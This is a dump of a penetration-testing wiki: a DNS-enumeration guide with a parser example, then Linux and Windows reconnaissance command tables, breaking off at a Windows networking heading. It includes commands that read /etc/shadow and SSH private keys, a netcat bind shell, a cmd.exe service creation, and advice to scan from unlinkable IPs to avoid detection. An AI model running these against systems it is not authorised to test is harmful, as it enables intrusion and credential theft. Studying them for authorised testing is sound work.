```text
├── 1.Information-Gathering
│   ├── How-to-gather-Whois-Information-Gathering.md
│   ├── How-to-gather-dns-information.md
│   ├── Linux
│   │   └── README.md
│   ├── README.md
│   └── Windows
│       └── README.md
├── 2.Vulnerability-Assessment
│   ├── Android-Assessment
│   │   └── README.md
│   ├── Database-Assessment
│   │   ├── mongodb
│   │   │   ├── MongoDB Pentesting for Absolute Beginners.pdf
│   │   │   ├── MongoDB_Lab.zip
│   │   │   └── mongodb_hacking.md
│   │   ├── mysql
│   │   │   └── README.md
│   │   ├── postgresql
│   │   │   └── postgresql_hacking.md
│   │   └── sqlite
│   │       ├── curl_hacking.md
│   │       └── sqlite_hacking.md
│   ├── Network-Assessment
│   │   ├── Fuzzers
│   │   │   └── sulley
│   │   │       └── fuzz_PCManftpd32.py
│   │   └── Jenkins
│   │       ├── Jenkins_hacking.md
│   │       ├── execmd.groovy
│   │       └── writefile.groovy
│   ├── OS-Assessment
│   │   └── OSX
│   │       └── README.md
│   └── README.md
├── 3.Exploitation-Tools
│   ├── Network-Exploitation
│   │   └── ports_number.md
│   └── README.md
├── 4.Post-Exploitation
│   ├── How-to-hack-Cisco-ASA-with-CVE-2016-6366.md
│   ├── README.md
│   └── Windows_ActiveDirectory
│       ├── Execute_metasploit_vbs_payload_in_cmd_shell.md
│       ├── Hacking_Windows_Active_Directory.md
│       ├── How-to-dump-windows2012-credentials.md
│       ├── How-to-use-vssadmin.md
│       ├── PowerSploit_Invoke-Mimikatz_in_cmd.md
│       ├── Windows_AD_commands.md
│       ├── msf-download-execute-vbs-payload.png
│       ├── msf-execute-vbs-payload.png
│       ├── us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection-wp.pdf
│       ├── us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection.pdf
│       └── windows-2012-lsass-dump.png
├── 5.Privilege-Escalation
│   └── README.md
├── 6.Maintaining-Access
│   └── README.md
├── 7.Reporting
│   ├── README.md
│   └── amanhardikar-keepnote
│       ├── knextinfra.zip
│       ├── knwebapps.zip
│       └── knwireless.zip
├── Books
│   └── README.md
├── CTFS
│   ├── Flick
│   │   └── README.md
│   ├── Nebula
│   │   ├── README.md
│   │   ├── level00.md
│   │   ├── level01.md
│   │   ├── level02.md
│   │   ├── level03.md
│   │   ├── level04.md
│   │   ├── level05.md
│   │   ├── level06.md
│   │   ├── level07.md
│   │   ├── level08.md
│   │   ├── level09.md
│   │   ├── level10.md
│   │   ├── level11.md
│   │   ├── level12.md
│   │   ├── level13.md
│   │   ├── level14.md
│   │   ├── level15.md
│   │   ├── level16.md
│   │   ├── level17.md
│   │   ├── level17.py
│   │   ├── level18.md
│   │   └── level19.md
│   ├── NullByte
│   │   └── NullByte-1.md
│   └── README.md
├── Information-Security-Conferences
│   └── README.md
├── LICENSE
├── README.md
├── Reverse-Engineering
│   ├── IDA
│   │   ├── Background_Analysis.md
│   │   ├── Command_line_swithes.md
│   │   ├── IDA-command-line-options.png
│   │   ├── Instant_debugger.md
│   │   ├── Main_Idea.md
│   │   ├── Plugin_Options.md
│   │   ├── The_Names_Windows.md
│   │   └── TiGa-vid1_reverseMe
│   │       ├── Keyfile.dat
│   │       ├── TiGa-vid1_reverseMe.exe
│   │       └── TiGa-vid1_reverseMe.idb
│   ├── Reverse_Engineering_for_Beginners-en.pdf
│   └── The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf
└── System-Services
    ├── README.md
    └── services
        ├── service-ftp.md
        └── twisted-ftp.md
```

-------------------------------------------------------------------------------- /1.Information-Gathering/How-to-gather-dns-information.md: --------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >

----

# How to gather dns information ?

- Passive mode
  - DNS Enumeration
  - OSINT
- Offensive mode
  - spider websites
- Tools
  - recon-ng
  - dnsrecon
  - theHarvester

## Passive mode

### DNS Enumeration

**DNS enumeration** is the process of locating all the DNS servers and their corresponding records for an organization. A company may have both internal and external DNS servers that can yield information such as usernames, computer names, and IP addresses of potential target systems. Many tools can be used to gather information for DNS enumeration; examples are NSlookup, DNSstuff, the American Registry for Internet Numbers (ARIN), and Whois. To enumerate DNS, you must understand DNS and how it works.

You must have knowledge about DNS records.
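Knowing the record types is easier once you have seen how they look on the wire. The following is an added example, not code from the original page or the nixawk repository: a small Python parser for the DNS message format of RFC 1035 / RFC 3596, run against a response that is constructed in memory for `demo.com` (the placeholder domain used throughout this page), so nothing is sent over the network. It shows how the answer section carries A, AAAA, MX, NS and TXT records, how name compression pointers work, and how to pull the SPF policy out of TXT data. The helper names (`read_name`, `parse_response`, `find_spf`) and the sample values (192.0.2.10, 2001:db8::10, mail.demo.com, ns1.demo.com) are the example's own.

```python
"""Decode a DNS response and group its answer records by type.

Added example (not code from the original page). Parses the RFC 1035 wire
format for the record types the page lists, from a response message that is
constructed below, so nothing touches the network.
"""
from __future__ import annotations

import ipaddress
import struct

# Record type codes -> names used on this page
TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 12: "PTR", 15: "MX",
              16: "TXT", 28: "AAAA", 33: "SRV", 47: "NSEC"}


def read_name(msg: bytes, offset: int) -> tuple[str, int]:
    """Read a possibly compressed name at offset; return (name, offset after it)."""
    labels: list[str] = []
    end = offset                 # where the caller resumes parsing
    jumped = False
    hops = 0
    while True:
        if offset >= len(msg):
            raise ValueError("truncated name")
        length = msg[offset]
        if length & 0xC0 == 0xC0:            # 11xxxxxx: pointer into the message
            if not jumped:
                end = offset + 2             # a pointer is always the last 2 bytes
            offset = struct.unpack_from("!H", msg, offset)[0] & 0x3FFF
            jumped, hops = True, hops + 1
            if hops > 32:                    # refuse pointer loops
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:                      # root label ends the name
            return ".".join(labels) + ".", (end if jumped else offset)
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def parse_rdata(msg: bytes, rtype: int, off: int, rdlength: int) -> str:
    """Render RDATA of the common types as text; unknown types as hex."""
    if rtype == 1:                                    # A: 4-byte IPv4
        return str(ipaddress.IPv4Address(msg[off:off + 4]))
    if rtype == 28:                                   # AAAA: 16-byte IPv6
        return str(ipaddress.IPv6Address(msg[off:off + 16]))
    if rtype in (2, 5, 12):                           # NS, CNAME, PTR: one name
        return read_name(msg, off)[0]
    if rtype == 15:                                   # MX: preference + exchange
        pref = struct.unpack_from("!H", msg, off)[0]
        return f"{pref} {read_name(msg, off + 2)[0]}"
    if rtype == 16:                                   # TXT: <len><chars> strings
        parts, end = [], off + rdlength
        while off < end:
            n = msg[off]
            parts.append(msg[off + 1:off + 1 + n].decode("ascii", "replace"))
            off += 1 + n
        return " ".join(f'"{p}"' for p in parts)
    return msg[off:off + rdlength].hex()


def parse_response(msg: bytes) -> dict[str, list[tuple[str, int, str]]]:
    """Return {type_name: [(owner, ttl, rdata), ...]} for the answer section."""
    _id, flags, qdcount, ancount, _ns, _ar = struct.unpack_from("!6H", msg, 0)
    if not flags & 0x8000:
        raise ValueError("not a response (QR bit clear)")
    if flags & 0xF:
        raise ValueError(f"server returned RCODE {flags & 0xF}")
    off = 12
    for _ in range(qdcount):                          # skip the question section
        _, off = read_name(msg, off)
        off += 4                                      # QTYPE + QCLASS
    records: dict[str, list[tuple[str, int, str]]] = {}
    for _ in range(ancount):
        owner, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlength = struct.unpack_from("!HHIH", msg, off)
        off += 10
        rdata = parse_rdata(msg, rtype, off, rdlength)
        off += rdlength
        records.setdefault(TYPE_NAMES.get(rtype, str(rtype)), []).append((owner, ttl, rdata))
    return records


def find_spf(records: dict[str, list[tuple[str, int, str]]]) -> list[str]:
    """SPF policies published as TXT (the SPF row of the table); more than one is a misconfiguration."""
    return [r[2].strip('"') for r in records.get("TXT", []) if r[2].startswith('"v=spf1')]


# ---- constructed sample response (not captured traffic) ----
def _name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def _rr(owner: bytes, rtype: int, ttl: int, rdata: bytes) -> bytes:
    return owner + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


PTR_QNAME = b"\xc0\x0c"                    # pointer to the question name at offset 12
SAMPLE_RESPONSE = (
    struct.pack("!6H", 0x1234, 0x8180, 1, 5, 0, 0)             # QR|RD|RA, 1 question, 5 answers
    + _name("demo.com") + struct.pack("!HH", 255, 1)            # question: demo.com ANY IN
    + _rr(PTR_QNAME, 1, 300, bytes([192, 0, 2, 10]))
    + _rr(PTR_QNAME, 28, 300, ipaddress.IPv6Address("2001:db8::10").packed)
    + _rr(PTR_QNAME, 15, 3600, struct.pack("!H", 10) + b"\x04mail" + PTR_QNAME)
    + _rr(PTR_QNAME, 2, 86400, b"\x03ns1" + PTR_QNAME)
    + _rr(PTR_QNAME, 16, 300, bytes([14]) + b"v=spf1 mx -all")
)

if __name__ == "__main__":
    for rtype, rrs in parse_response(SAMPLE_RESPONSE).items():
        for owner, ttl, rdata in rrs:
            print(f"{owner:<12} {ttl:>6} {rtype:<5} {rdata}")
```

The same parser handles a real answer captured with `dnsrecon` or `dig`; the only part of the message that is domain-specific is the constructed `SAMPLE_RESPONSE`.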
The list of DNS record types below gives an overview of the resource records (database records) stored in the zone files of the Domain Name System (DNS). The DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses. In these domain servers, different record types are used for different purposes. The following list describes the common DNS record types and their use:

|**DNS Record types**|methods|description|
|:-----------------------|:----------|:--------------|
|dns query|A|***Address record***, Returns a 32-bit IPv4 address, most commonly used to map hostnames to an IP address of the host, but it is also used for DNSBLs, storing subnet masks in RFC 1101, etc.|
|dns query|CNAME|***Canonical name record***, Alias of one name to another: the DNS lookup will continue by retrying the lookup with the new name.|
|dns query|AAAA|***IPv6 address record***, Returns a 128-bit IPv6 address, most commonly used to map hostnames to an IP address of the host.|
|dns query|MX|***Mail exchange record***, Maps a domain name to a list of message transfer agents for that domain.|
|dns query|NS|***Name server record***, Delegates a DNS zone to use the given authoritative name servers.|
|dns query|SOA|***Start of authority record***, Specifies authoritative information about a DNS zone, including the primary name server, the email of the domain administrator, the domain serial number, and several timers relating to refreshing the zone.|
|dns query|SPF|***Sender Policy Framework***, a simple email-validation system designed to detect email spoofing by providing a mechanism that allows receiving mail exchangers to check that incoming mail from a domain comes from a host authorized by that domain's administrators.|
|dns query|TXT|***Text record***, Originally for arbitrary human-readable text in a DNS record.|
|dns query|PTR|***Pointer record***, Pointer to a canonical name. Unlike a CNAME, DNS processing stops and just the name is returned. The most common use is for implementing reverse DNS lookups, but other uses include such things as DNS-SD.|
|dns query|SRV|***Service locator***, Generalized service location record, used for newer protocols instead of creating protocol-specific records such as MX.|
|dns query|NSEC|***Next Secure record***, Part of DNSSEC, used to prove a name does not exist. Uses the same format as the (obsolete) NXT record.|
|dns query|AXFR|***Authoritative Zone Transfer***, Transfers the entire zone file from the master name server to secondary name servers. **DNS Zone Transfer** is typically used to replicate DNS data across a number of DNS servers, or to back up DNS files. A user or server will perform a specific zone transfer request from a name server. If the name server allows zone transfers to occur, all the DNS names and IP addresses hosted by the name server will be returned in human-readable ASCII text.|
|dns query|IXFR|***Incremental Zone Transfer***, Transfers zone data from the master name server to secondary name servers.|
|dns query|DNS Wildcard|Check whether the name server answers wildcard queries, or whether its responses are faked.|
|dns query|domain bruteforce|Bruteforce subdomains with wordlists.|
|dns query|reverse bruteforce|Reverse IP lookups for the domain's address ranges.|
|dns query|srv bruteforce|Bruteforce SRV records.|
|dns query|gtld bruteforce|Bruteforce gTLD records.|
|dns query|tld bruteforce|Bruteforce TLD records.|

### OSINT

|OSINT|Category|Description|
|:----|:-------|:----------|
|OSINT|Google|Spider domains from Google pages with domain:`demo.com`|
|OSINT|Bing|Spider domains from Bing pages with domain:`demo.com`|
|OSINT|Yahoo|Spider domains from Yahoo with domain:`demo.com`|
|OSINT|Baidu|Spider domains from Baidu with domain:`demo.com`|
|OSINT|Netcraft|Spider domains from netcraft searchdns pages|
|OSINT|Github|Spider domains from github pages|
|OSINT|Shodan|Search domains from Shodan|
|OSINT|Censys|Search domains from censys|
|OSINT|ZoomEye|Search domains from ZoomEye|

## Offensive mode

|**offensive mode**|**methods**|**description**|
|:-----------------|:----------|:--------------|
|Websites|Spider default page|Scan default pages and spider domains|
|Websites|Certificates|Scan domains certificates|

## Tools

|**recon-ng Command**|**Description**|
|:-------------------|:--------------|
|use recon/domains-hosts/baidu_site|Search domains with baidu|
|use recon/domains-hosts/bing_domain_api|Search domains with bing api|
|use recon/domains-hosts/bing_domain_web|Search domains from bing web pages.|
|use recon/domains-hosts/brute_hosts|Bruteforce subdomains|
|use recon/domains-hosts/google_site_api|Search domains with google api|
|use recon/domains-hosts/google_site_web|Search domains from google web pages.|
|use recon/domains-hosts/netcraft|Search domains from netcraft pages.|

|**dnsrecon Command**|**Description**|
|:----------|:--------------|
|dnsrecon -n `8.8.8.8` -d `demo.com`|Please use a valid DNS server in order to avoid faked DNS responses.|
|dnsrecon -d `demo.com` -t std|SOA, NS, A, AAAA, MX and SRV if AXFR on the NS servers fails.|
|dnsrecon -d `demo.com` -t rvl|Reverse lookup of a given CIDR or IP range.|
|dnsrecon -d `demo.com` -t brt -D `/path/to/subdomains.wd`|Brute force domains and hosts using a given dictionary.|
|dnsrecon -d `demo.com` -t brt -D `/path/to/subdomains.wd` --iw|Brute force domains and hosts using a given dictionary. Continue brute forcing a domain even if wildcard records are discovered.|
|dnsrecon -d `demo.com` -t srv|SRV records|
|dnsrecon -d `demo.com` -t axfr|Test all NS servers for a zone transfer.|
|dnsrecon -d `demo.com` -t goo|Perform Google search for subdomains and hosts.|
|dnsrecon -d `demo.com` -t tld|Remove the TLD of the given domain and test against all TLDs registered in IANA.|
|dnsrecon -d `demo.com` -t zonewalk|Perform a DNSSEC zone walk using NSEC records.|
|dnsrecon -d `demo.com` --db `/path/to/results.sqlite`|Save results in a sqlite file.|
|dnsrecon -d `demo.com` --xml `/path/to/results.xml`|Save results in an xml file.|
|dnsrecon -d `demo.com` -c `/path/to/results.csv`|Save results in a csv file.|
|dnsrecon -d `demo.com` -j `/path/to/results.json`|Save results in a json file.|

|**theHarvester Command**|**Description**|
|:-----------------------|:--------------|
|theharvester -d `demo.com` -b all|Search google, googleCSE, bing, bingapi, pgp, linkedin, google-profiles, jigsaw, twitter, googleplus, all|
|theharvester -d `demo.com` -n|Perform a DNS reverse query on all ranges discovered|
|theharvester -d `demo.com` -c|Perform a DNS brute force for the domain name|
|theharvester -d `demo.com` -t|Perform a DNS TLD expansion discovery|
|theharvester -d `demo.com` -e `8.8.8.8`|Specify a DNS server|
|theharvester -d `demo.com` -h|Use the SHODAN database to query discovered hosts|

|**Metasploit Command**|**Description**|
|:---------------------|:--------------|
|msf > use auxiliary/gather/enum_dns|Gather DNS record information (A, AAAA, CNAME, ZoneTransfer, SRV, TLD, RVL, ...)|

# Links

1. https://en.wikipedia.org/wiki/List_of_DNS_record_types
2. https://www.exploit-db.com/docs/12389.pdf
3. https://pentestlab.blog/tag/dns-enumeration/
4.
http://tools.kali.org/information-gathering/dnsrecon
5. https://github.com/nixawk/ig/

-------------------------------------------------------------------------------- /1.Information-Gathering/Linux/README.md: --------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >

----

# Information Gathering - Linux

## System Architecture

|**Command**|**Description**|
|:----------|:--------------|
|uname -a|The **uname** command reports basic information about a computer's software and hardware.|
|cat /etc/issue|The file **/etc/issue** is a text file which contains a message or system identification to be printed before the login prompt.|
|cat /etc/*-release|**/etc/lsb-release**, **/etc/redhat-release** files contain a description line which is parsed to get information. ex: "Distributor release x.x (Codename)"|
|cat /proc/version|**/proc/version** specifies the version of the Linux kernel, the version of gcc used to compile the kernel, and the time of kernel compilation. It also contains the kernel compiler's user name.|
|cat /proc/sys/kernel/version|The files in **/proc/sys/kernel/** can be used to tune and monitor miscellaneous and general things in the operation of the Linux kernel. [**Kernel - Documentation**](https://www.kernel.org/doc/Documentation/sysctl/kernel.txt)|

## Processes

|**Command**|**Description**|
|:----------|:--------------|
|ps -ef<br>ps aux|**ps** reports a snapshot of the current processes.|
|top|The **top** command displays processor activity of your Linux box and also displays tasks managed by the kernel in real time. It shows how the processor and memory are being used, and other information such as running processes.|
|ls -al /proc/|**/proc** is very special in that it is also a virtual filesystem. It's sometimes referred to as a process information pseudo-file system. It doesn't contain 'real' files but runtime system information (e.g. system memory, devices mounted, hardware configuration, etc).|
|ls -al /proc/3080|View information about PID **3080**.|

## Users and Groups

|**Command**|**Description**|
|:----------|:--------------|
|id|Find a user's UID or GID and other information.|
|w|Display who is logged into the Linux and Unix-like server.|
|whoami|Display the user name of the owner of the current login session to standard output.|
|lastlog|Formats and prints the contents of the last login log /var/log/lastlog file.|
|cat /etc/passwd|A text-based database of information about users that may log in to the system or other operating system user identities that own running processes.|
|cat /etc/shadow|**/etc/shadow** is used to increase the security level of passwords by restricting all but highly privileged users' access to hashed password data. Typically, that data is kept in files owned by and accessible only by the super user.|
|cat /etc/master.passwd|**/etc/master.passwd** on BSD systems|
|cat /etc/sudoers|**/etc/sudoers** has the rules that users have to follow when using the sudo command.|
|sudo -V|Print the sudo version string|
|cat ~/.ssh/authorized_keys|With public key authentication, the authenticating entity has a public key and a private key. Each key is a large number with special mathematical properties. The private key is kept on the computer you log in from, while the public key is stored in the **.ssh/authorized_keys** file on all the computers you want to log in to.|
|cat ~/.ssh/identity.pub|The file **identity.pub** contains your public key, which can be added to other systems' authorized keys files.|
|cat ~/.ssh/identity|The ssh client allows you to select a file from which the identity (private key) for RSA or DSA authentication is read.|
|cat ~/.ssh/id_rsa.pub|RSA public key, saved as .ssh/id_rsa.pub.|
|cat ~/.ssh/id_rsa|RSA private key, saved as .ssh/id_rsa in your home folder.|
|cat ~/.ssh/id_dsa.pub|DSA public key, saved as .ssh/id_dsa.pub.|
|cat ~/.ssh/id_dsa|DSA private key, saved as .ssh/id_dsa in your home folder.|
|cat /etc/ssh/ssh_config|OpenSSH SSH client configuration file|
|cat /etc/ssh/sshd_config|OpenSSH SSH server configuration file|
|cat /etc/ssh/ssh_host_dsa_key.pub|The DSA public key used by the sshd daemon.|
|cat /etc/ssh/ssh_host_dsa_key|The DSA private key used by the sshd daemon.|
|cat /etc/ssh/ssh_host_rsa_key.pub|The RSA public key used by the sshd daemon for version 2 of the SSH protocol.|
|cat /etc/ssh/ssh_host_rsa_key|The RSA private key used by the sshd daemon.|

## Services

|**Command**|**Description**|
|:----------|:--------------|
|service --status-all|Check the status of all services|
|systemctl -a|List all units installed in the file system.|
|service `servicename` start<br>systemctl start `servicename`|Start a service|
|service `servicename` stop<br>systemctl stop `servicename`|Stop a service|
|service `servicename` status<br>systemctl status `servicename`|Show the status of a service|
|cat /etc/services|/etc/services maps port numbers to named services.|

## Security

|**Command**|**Description**|
|:----------|:--------------|
|iptables -L|List all rules in the selected chain.|
|iptables -F|Flush the selected chain.|
|iptables -A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT|Allow incoming ICMP echo replies (type 0). Please try **iptables -p icmp --help** for more details.|
|iptables -A INPUT -p tcp -m tcp --sport 80 -m state --state RELATED,ESTABLISHED -j ACCEPT|Allow tcp connections from src port 80|
|iptables -A OUTPUT -p tcp -m tcp --dport 80 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT|Allow tcp connections from/to dst port 80.|
|iptables -A INPUT -p udp -m udp --sport 53 -m state --state RELATED,ESTABLISHED -j ACCEPT|Allow udp connections from src port 53|
|iptables -A OUTPUT -p udp -m udp --dport 53 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT|Allow udp connections from/to dst port 53.|
|iptables -A OUTPUT -p tcp -m tcp --sport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT<br>iptables -A OUTPUT -p tcp -m tcp --dport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT|Allow localhost to connect to localhost:55552|

## Networking

|**Command**|**Description**|
|:----------|:--------------|
|ifconfig -a|Display all interfaces which are currently available, even if down.|
|hostname|Show or set the system's host name.|
|dnsdomainname|Show the system's DNS domain name.|
|netstat -antp|Show network status (TCP sockets with owning process)|
|netstat -anup|Show network status (UDP sockets with owning process)|
|chkconfig --list|List SysV services and the runlevels they are enabled in.|
|lsof -nPi|List open network files, without resolving host names or port names|
|route -e|Show / manipulate the IP routing table|
|iwconfig|Configure a wireless network interface|
|cat /etc/resolv.conf|The resolver configuration file contains information that is read by the resolver routines the first time they are invoked by a process. The file is designed to be human readable and contains a list of keywords with values that provide various types of resolver information. If this file does not exist, only the name server on the local machine will be queried; the domain name is determined from the hostname and the domain search path is constructed from the domain name.|
|cat /etc/hosts|**/etc/hosts** is a simple text file that associates IP addresses with hostnames, one line per IP address.|
|cat /etc/network/interfaces|The **/etc/network/interfaces** file contains network interface configuration information.|
|cat /etc/sysconfig/network|The **/etc/sysconfig/network** file is used to specify information about the desired network configuration on your server.|
|cat /etc/networks|**/etc/networks** is a plain ASCII file that describes known DARPA networks and symbolic names for these networks.|
|cat /proc/net/tcp|Print tcp info in hex mode|
|cat /proc/net/udp|Print udp info in hex mode|
|cat /proc/net/icmp|Print icmp info in hex mode|
|cat /proc/net/route|Print route info in hex mode|
|cat /etc/inetd.conf|inetd, also called the super server, will load a network program based upon a request from the network. The inetd.conf file tells inetd which ports to listen on and what server to start for each port.|
|cat /etc/xinetd.conf|xinetd.conf is the configuration file that determines the services provided by xinetd.|
|ls -R /etc/network/|Show files about network configuration|
|ls -al /etc/init.d|List all init scripts|
|iptables -L -t nat|Print rules of the nat table|
|iptables -L -t mangle|Print rules of the mangle table|
|tcpdump|tcpdump cheat sheet|
|nc -v `host` `port`|Make a tcp connection to host:port|
|nc -v -e /bin/sh -l -p `port`|Listen on `port` and hand a /bin/sh shell to whoever connects (bind shell)|

## File Systems

|**Command**|**Description**|
|:----------|:--------------|
|cat /etc/profile|/etc/profile contains Linux system-wide environment and startup programs. It is used by all users with the bash, ksh and sh shells.|
|cat /etc/bashrc|/etc/bashrc or /etc/bash.bashrc is the system-wide bash per-interactive-shell startup file. It is used for system-wide functions and aliases.|
|cat ~/.bash_profile|Similar to /etc/profile, but just for the current user|
|cat ~/.bash_history|Print the current user's bash command history|
|cat ~/.bashrc|~/.bashrc is the individual per-interactive-shell startup file stored in your home directory $HOME.|
|cat ~/.zshrc|~/.zshrc is the individual per-interactive-shell startup file for zsh, stored in your home directory $HOME.|
|cat ~/.bash_logout|The file ~/.bash_logout is not used for an invocation of the shell. It is read and executed when a user exits from an interactive login shell.|
|ls -al /var/log/|List all log files|
|find / -perm -1000 -type d 2>/dev/null|Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.|
|find / -perm -g=s -type f 2>/dev/null|SGID (chmod 2000) - run as the group, not the user who started it.|
|find / -perm -u=s -type f 2>/dev/null|SUID (chmod 4000) - run as the owner, not the user who started it.|
|find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null|SGID or SUID|
|for i in $(locate -r "bin$"); do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done|Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)|
|find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null|Find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)|
|find / -writable -type d 2>/dev/null|World-writeable folders|
|find / -perm -222 -type d 2>/dev/null|World-writeable folders|
|find / -perm -o=w -type d 2>/dev/null|World-writeable folders|
|find / -perm -o=x -type d 2>/dev/null|World-executable folders|
|find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null|World-writeable & executable folders|
|find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print|World-writeable folders without the sticky bit|
|find /dir -xdev \( -nouser -o -nogroup \) -print|Files with no owner or no group|

## Scheduled

|**Command**|**Description**|
|:----------|:--------------|
|crontab -l|Display the current crontab on standard output|
|ls -alh /var/spool/cron|List per-user crontab spool directories|
|ls -al /etc/cron*|List system cron configuration files and job directories|
|cat /etc/cron*|Print system cron configuration files|
|cat /etc/at.allow|The /etc/at.allow and /etc/at.deny files determine which users can submit commands for later execution via at or batch.|
|cat /etc/at.deny|The /etc/at.allow and /etc/at.deny files determine which users can submit commands for later execution via at or batch.|
|cat /etc/cron.allow|Users allowed to use crontab|
|cat /etc/cron.deny|Users denied the use of crontab|
|cat /etc/crontab|System-wide crontab|
|cat /etc/anacrontab|Jobs run by anacron|
|ls -la /var/spool/cron/crontabs|List all users' crontab files|
|cat /var/spool/cron/crontabs/root|Print the root user's crontab|

# Links

1. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
2. https://github.com/CISOfy/lynis
3. https://github.com/rebootuser/LinEnum
4. https://github.com/nixawk/metasploit-modules/blob/master/.msf4/modules/post/linux/gather/enum_linux.rb
5. http://www.iptables.org/documentation/
6. http://packetlife.net/media/library/12/tcpdump.pdf

-------------------------------------------------------------------------------- /1.Information-Gathering/README.md: --------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) >

----

# Information Gathering

In the *information gathering* phase, you will gather any information you can about the organization you are attacking by using social-media networks, Google hacking, footprinting the target, and so on.
One of the most important skills a penetration tester can have is the ability to learn about a target, including how it behaves, how it operates, and how it ultimately can be attacked. The information that you gather about your target will give you valuable insight into the types of security controls in place.

During *information gathering*, you attempt to identify what protection mechanisms are in place at the target by slowly starting to probe its systems. For example, an organization will often only allow traffic on a certain subset of ports on externally facing devices, and if you query the organization on anything other than a whitelisted port, you will be blocked. It is generally a good idea to test this blocking behavior by initially probing from an expendable IP address that you are willing to have blocked or detected. The same holds true when you're testing web applications, where, after a certain threshold, the web application firewalls will block you from making further requests.

To remain undetected during these sorts of tests, you can perform your initial scans from IP address ranges that can't be linked back to you and your team. Typically, organizations with an external presence on the Internet experience attacks every day, and your initial probing will likely be an undetected part of the background noise.

|**Information Category**|**Bookmarks**|
|:---------------------|:----------|
| IP Analysis |https://www.iana.org/numbers<br>https://www.iana.org/assignments/as-numbers/as-numbers.xml<br>https://www.iso.org/obp/ui/#home<br>https://www.ultratools.com/tools/toolsHome<br>https://www.robtex.com/<br>http://www.team-cymru.org/IP-ASN-mapping.html<br>http://www.iplocation.net/<br>http://thyme.apnic.net/<br>http://bgp.he.net/<br>https://ipinfo.io|
| Whois Analysis |https://www.iana.org/numbers<br>http://www.domaintools.com/|
| DNS Analysis |http://www.alexa.com/<br>http://searchdns.netcraft.com/<br>http://centralops.net/co/<br>http://www.yougetsignal.com/<br>http://webhosting.info/whois/<br>http://reverseip.domaintools.com/<br>http://viewdns.info/reverseip/|
| Identify Live Hosts |https://nmap.org/dist/sigs/?C=M;O=D<br>https://zmap.io/<br>http://masscan.net/<br>http://www.secdev.org/projects/scapy/|
| IDS/IPS Identification |https://www.monkey.org/~dugsong/fragroute/<br>http://pytbull.sourceforge.net/<br>http://tcpreplay.synfin.net/|
| OSINT |https://www.shodan.io/<br>https://www.exploit-db.com/google-hacking-database/|

# Links

1. [**How to gather Windows information ?**](./Windows/README.md)
2. [**How to gather Linux information ?**](./Linux/README.md)
3. [**How to gather Mac OSX information ?**]()

-------------------------------------------------------------------------------- /1.Information-Gathering/Windows/README.md: --------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >, < [patitoaxel](https://github.com/patitoaxel) >

----

# Information Gathering - Windows

## System Architecture

|**Command**|**Description**|
|:----------|:--------------|
|ver|Displays the Windows version.|
|systeminfo<br>systeminfo /S `ComputerName` /U `username` /P `password`|This tool displays operating system configuration information for a local or remote machine, including service pack levels.|
|wmic os list brief|Installed operating system(s) management.|
|wmic computersystem list full|Computer system management.|

## Processes

|**Command**|**Description**|
|:----------|:--------------|
|tasklist<br>tasklist /M<br>tasklist /V|Displays a list of currently running processes on the local machine.|
|tasklist /FI "IMAGENAME eq cmd.exe"<br>tasklist /FI "PID ne 0"|Displays the set of processes that match the criteria specified by the filter.|
|tasklist /S `SERVER` /U `DOMAIN\username` /P `password`|Displays a list of currently running processes on a remote machine.|
|wmic process list brief|Process management.|

## Users and Groups

|**Command**|**Description**|
|:----------|:--------------|
|whoami|Lists information about the user you are currently logged in as.|
|net user|Displays user account information.|
|net user /domain|Performs the operation on the domain controller in the computer's primary domain.|
|net localgroup administrators|Displays the local administrators group on the computer.|
|net localgroup administrators /domain|Displays the local administrators group on the current domain controller.|
|net group /domain|Displays groups, performing the operation on the domain controller in the current domain.|
|net group "Domain Admins" /domain|Query users from Domain Admins in the current domain.|
|net group "Domain Computers" /domain|Query all domain computers in the current domain.|
|net group "Domain Controllers" /domain|Query Domain Controller computers.|
|net group "Domain Policy Creator Owners" /domain|Query Domain Policy Creators.|
|net accounts /domain|Updates the user accounts database and modifies password and logon requirements for all accounts. Performs the operation on the primary domain controller of the current domain.|
|wmic useraccount|User account management.|
|wmic useraccount LIST BRIEF|Print account information.|

## Services

|**Command**|**Description**|
|:----------|:--------------|
|sc qc `servicename`|Queries the configuration information for a service (**BINARY_PATH_NAME** and so on).|
|sc query `servicename`|Queries the status for a service, or enumerates the status for types of services.|
|sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys|Creates a service entry in the registry and Service Database.|

## Security

|**Command**|**Description**|
|:----------|:--------------|
|wmic qfe get hotfixid|Information about patches (hotfixes) installed on the Windows host|
|NETSH FIREWALL show all|Show the allowed programs configuration for the Domain/Standard profile.|

## Networking

